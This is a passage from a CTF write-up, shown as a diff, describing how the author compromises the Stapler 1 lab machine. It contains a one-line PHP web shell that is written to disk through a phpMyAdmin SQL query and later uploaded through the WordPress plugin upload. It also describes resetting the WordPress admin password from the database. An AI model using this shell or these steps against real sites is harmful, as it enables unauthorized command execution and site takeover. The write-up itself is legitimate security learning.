ChrisPritchard/ctf-writeups/07-stapler-1.md

 In phpmyadmin I could use the SQL command window to upload a php shell to /tmp: `SELECT "<?php system($_GET['cmd']); ?>" into outfile "/tmp/cmd.php"`, which I then checked via the smbclient from before to confirm that yes, /tmp is being shared.
 Given I could have also uploaded the shell over smb this didn't give me much however.

-I went to the wordpress database, the wp_users table and found the admin user, John.
+I went to the wordpress database and the wp_users table and found the admin user, John.
 Via the phpmyadmin interface I was able to reset John's password to `hacktheplanet` encoded with MD5 (all done through the interface).
 This allowed me to then log in to wordpress through wp-admin.

 As the admin I poked around, and at the suggestion of a hacker friend of mine used the interface to 'add a new plugin'.
 The plugin process wouldn't work without FTP credentials, however anything I selected as a plugin would get uploaded to `wp-content/uploads`.
 I uploaded a cmd.php file (containing just `<?php system($_GET['cmd']); ?>` as above) and sure enough, `:12380/blogblog/wp-content/uploads/cmd.php?cmd=whoami` gave me that magic `www-data` in the window.